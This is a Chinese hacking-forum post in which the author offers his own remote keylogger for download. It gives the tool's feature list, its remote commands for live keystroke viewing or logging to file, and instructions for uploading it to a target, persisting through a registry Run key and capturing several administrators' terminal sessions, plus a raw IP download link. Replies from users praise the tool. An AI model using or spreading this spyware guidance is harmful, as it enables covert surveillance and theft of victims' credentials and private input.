论坛: 原创软件 标题: WinEggDropOnlineKeyloggerV1.1 复制本贴地址    
作者: wineggdrop [wineggdrop]    论坛用户   登录
特点:
1.小型
2.可以用户自已设置
3.可以直接连接上去实时看用户输入


这个键盘记录程序主要功能说明:
1.可在所有32位或NT的windows下运行(Win95到xp都没问题,2003 server就真是没有了,所以无法测试)
2.键盘记录程序会打开一个端口,用户连接上那个端口后,使用命令可以在线直接看对方的输入.
3.用户可以自己设置程序打开的端口和连接使用的密码,以及将得到的击键保存到的文件名等,这
  给了用户很大的设置能力。
4.密码是以MD5的checksum作为验证的,所以就算程序被人得到,一样不用担心被人容易地得到
  密码。
5.这个键盘记录程序有两种模式,一种是直接将得到的键保存到文件模式,另一种就是用户连接上
  后直接看对方的键盘输入模式。

V1.1 功能说明
以下说明都是用户连接成功后输入的。
功能说明:
1.ViewkeYLog                      功能说明:查看当前键盘记录程序是处于什么模式
用法:ViewKeyLog

2.StopKeyLog                      功能说明:停止键盘记录
用法:StopKeyLog

3.Stop                            功能说明:将程序退出,你要再运行或重启后程序才会再被运行
用法:Stop

4.Exit                            功能说明:退出连接
用法:Exit

5.Help                            功能说明:在线查看帮助
用法:Help


6.StartKeyLog                     功能说明:启动键盘记录
用法:StartKeyLog Show|Log
例子:StartKeyLog Show             功能:以在线直接看对方输入模式启动键盘记录
例子:StartKeyLog Log              功能:以将得到的击键保存到文件模式启动键盘记录

7.Switch                          功能说明:在两种模式种切换
用法:Switch
例如当前键盘记录是处于在线直接查看模式(用ViewKeyLog命令可以看到),使用Switch后键盘记录
就会切换到保存到文件的模式。


一般用法:
1.设置好键盘记录程序
2.上传后直接运行就可以了,但要注意,在system权限下,程序是无法运行的,那是我故意设置的,
  因为在system权限下,程序启动后一样无法得到用户的输入的,或者你要使用第三方程序,如
  runas来帮助程序以一个管理员身份去运行。
3.程序运行后会自动在注册表生成一个键值,以便重启后都会被加载。
4.当程序被运行后,就是处于记录模式(就是说记录到的键值会写到文件中去,如果你想转换模式
  的话,自己连接上去,然后使用Switch那个命令,就可以将记录模式转换到实时看输入模式)

测试方法:
1.在自己系统中运行,然后自己连接上自己的系统,连接上后输入switch命令,然后自己在其它窗口
  ,如记事本或IE中输入些东西,就可以看到自己的输入在屏幕中显示出来。
2.在远程系统,最好是有终端的(因为如果管理员没有本地登陆的话,根本没法记录到东西,如果
  登录了,程序又不是以那个管理员身份运行的,一样无法记录到),装好后,自己登上终端,然后
  看看程序应该打开的端口有没有打开,有的话就直接用nc或telnet连上去,然后自己在终端中输入
  些字符,看看这些输入有没有被记录或者转换到实时看输入模式中直接看。


特别说明:
1.如果程序是加入键值在run中运行的话,如果那系统又是有终端的话,那么程序是有机会被运行几次的,例如程序设置打开的端口是12345,当本地管理员登陆后,程序被运行第一次,就会打开12345这端口等待用户连接;当有管理员远程使用终端登陆后,程序会被运行第二次,会打开12346这个端口,如果还有一个管理员登上终端,那么程序就被运行了第三次,会打开12347这端口。就是说,如果上面所举的例子有三个管理员分另从本地和终端登陆的话,程序会被运行三次,而且打开三个不同的端口等待用户连接。例如连接12345端口的,可以看到本地管理员的键盘输入;连接12346,可以看到第一个远程登陆的管理员的输入;12347就是第二个远程登陆管理员的输入。

2.不会回答任何在说明中找到的问题。

211.93.112.71/pubkeylog.zip





地主 发表时间: 04/15 13:26
回复: jnake [jnake]   论坛用户   登录
大哥,小弟真是佩服佩服,哈哈,这么小的一个东西,而功能却不弱!!


B1层 发表时间: 04/15 19:45
回复: magic [buaaytt]   论坛用户   登录
我靠
看看进阶版溶的倒霉经历吧
就是你写的?

B2层 发表时间: 04/17 22:19
回复: wineggdrop [wineggdrop]   论坛用户   登录
程序是我写的,也提供了删除方法了。

B3层 发表时间: 04/18 17:03
回复: jnake [jnake]   论坛用户   登录
来来,说说删除的方法来着!

B4层 发表时间: 04/19 17:07

论坛: 原创软件

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号